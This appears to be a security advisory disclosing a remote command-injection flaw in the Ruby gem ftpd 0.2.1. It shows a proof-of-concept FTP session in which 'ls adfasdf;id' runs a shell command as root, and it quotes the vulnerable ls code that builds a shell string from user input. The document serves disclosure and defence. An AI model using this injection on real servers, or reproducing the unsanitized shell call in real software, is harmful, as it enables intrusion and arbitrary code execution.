Title:Remote command execution for Ruby Gem ftpd-0.2.1
The ls interface can have commands injected into it if option or filename contain the shell character ; The example.rb server listens to localhost only which I used to test the ftp library. But if this gem is used normally it could be configured to listen on

for this to work the file must exist in the CWD.
ftp> root@ubuntu:/tmp# sh /tmp/connect-to-example-ftp-server.sh
Connected to localhost.
220 ftpd
Name (localhost:root):
331 Password required
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.

* I created the filename adfasdf

ftp> ls adfasdf;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete

The problem code is below

204 Ls interface used by List and NameList 205
206 module Ls

208       def ls(ftp_path, option)
209         path = expand_ftp_path(ftp_path)
210         dirname = File.dirname(path)
211         filename = File.basename(path)
212         command = [
213           'ls',
214           option,
215           filename, <-- ;cmd inject
216           '2>&1',
217         ].compact.join(' ')
218         if File.exists?(dirname) <- file has to exist to exec ls command
219           list = Dir.chdir(dirname) do
220             `{command}` <-- exec´╗┐